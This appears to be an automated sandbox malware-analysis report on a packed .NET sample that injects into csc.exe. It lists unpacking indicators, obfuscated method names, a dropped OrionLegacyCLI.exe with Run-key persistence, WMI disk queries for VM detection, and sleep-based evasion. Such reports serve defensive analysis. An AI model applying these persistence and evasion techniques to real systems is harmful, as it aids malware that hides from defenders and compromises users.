              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: 4JwhvqLe8n.exeStatic file information: File size 2652160 > 1048576
              Source: 4JwhvqLe8n.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x257400
              Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 4JwhvqLe8n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Users\samcnary\Desktop\legacyPM\core\CoreService\runtime\OriginLegacyCLI.pdb source: 4JwhvqLe8n.exe, OrionLegacyCLI.exe.1.dr
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.2629450491.0000000006E78000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2631230382.0000000009F80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.0000000008283000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630517954.00000000093D0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.0000000007EAC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.2629450491.0000000006E78000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2631230382.0000000009F80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.0000000008283000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630517954.00000000093D0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.0000000007EAC000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Detected unpacking (creates a PE file in dynamic memory)
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeUnpacked PE file: 1.2.4JwhvqLe8n.exe.2370000.2.unpack
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 1.2.4JwhvqLe8n.exe.820000.1.raw.unpack, ResponderElement.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})
              .NET source code contains potential unpacker
              Source: 1.2.4JwhvqLe8n.exe.820000.1.raw.unpack, MapAnalyzer.cs.Net Code: IncludeMap System.Reflection.Assembly.Load(byte[])
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.3.csc.exe.81c5b88.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.3.csc.exe.81c5b88.7.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.3.csc.exe.81c5b88.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.3.csc.exe.81c5b88.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.3.csc.exe.81c5b88.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, mD3UqCQfvhthrqY1XLA.cs.Net Code: mpweScRsCB
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, mD3UqCQfvhthrqY1XLA.cs.Net Code: Y1lwRxS2Wu
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 3.2.csc.exe.9540000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.csc.exe.7e36ca8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.2630059901.0000000007DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2630667108.0000000009540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7552, type: MEMORYSTR
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: 4JwhvqLe8n.exeStatic PE information: real checksum: 0xca68c should be: 0x296cc4
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_00408243 push ebx; retf 1_2_00408244
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_004173A5 push ecx; ret 1_2_004173B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_069874D6 push bx; ret 3_2_069874D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_069842B8 push es; ret 3_2_069842C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_069843A9 push es; retf 3_2_069843C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_069843D5 push es; retf 3_2_069843D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094C1801 pushfd ; retf 3_2_094C180D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094CBACF push cs; retf 3_2_094CBAD7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094C068B push 8B000001h; iretd 3_2_094C0690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F0158 pushad ; iretd 3_2_095F0159
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FB3DE push edx; ret 3_2_095FB3DF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FB411 push ecx; ret 3_2_095FB415
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FD606 pushad ; retf 3_2_095FD639
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09813991 push es; retf 3_2_09813998
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098131AA push cs; retf 3_2_098131AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098121C9 push ds; retf 3_2_098121CD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09813322 push ss; retf 3_2_09813323
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0981212F push ds; retf 3_2_09812133
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09812B4A push ds; retf 3_2_09812B4E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09813175 push cs; retf 3_2_09813176
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098142BD push es; retf 3_2_098142CA
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, nVJXBHQlPK5MbsS3eA3.csHigh entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, x9vYvta5uRPmJpbcUPr.csHigh entropy of concatenated method names: 'r0lafIUClb', 'cfKxrtgbQjdlrUJ4Lfx', 'r5se3YgyGsm0NWhRKjC', 'P4Xa8ReiVU', 'qZDYH9gA7aOmK2rvP6D', 'XSZPQvg983alftxuAUX', 'oG2ah1h9cn', 'msdaPaGN1g', 'kHoCCxgUwIlMVxFK0C3', 'AYP2MKg49iKkeWLNiqS'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csHigh entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, h5gmjUDfwmEIIaJIRm.csHigh entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, mD3UqCQfvhthrqY1XLA.csHigh entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, Gp3qmlFjJ2RWq7TURuq.csHigh entropy of concatenated method names: 'zqBF8g5b3n', 'WoHM1igtKIfGu6GAOtX', 'pLtD82gJI3Ms4ZJA3Vm', 'lOPFhVX5Ra', 'FbeFP7saex', 'x61FRPcePl', 'DGRFqUpm9o', 'DXTFx5xgEE', 'paEF6FnxRs', 'wNlFBJ9xRY'
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile created: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exeJump to dropped file
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLIJump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLIJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6980000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6C10000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 8C10000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 567000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 6218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 3592Jump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeDropped PE file which has not been started: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exeJump to dropped file
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-14719
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeAPI coverage: 0.8 %
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep count: 35 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -32281802128991695s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7688Thread sleep count: 6218 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -119750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7688Thread sleep count: 3592 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59437s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59218s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59109s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58994s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58883s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58771s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58641s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58531s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58312s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58202s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58094s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -57985s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -57860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -57735s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -57610s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -57485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -57360s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -57235s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -57110s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -56985s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -56860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -56735s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -56610s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -56485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -56078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -55682s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -55563s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -55453s >= -30000sJump to behavior
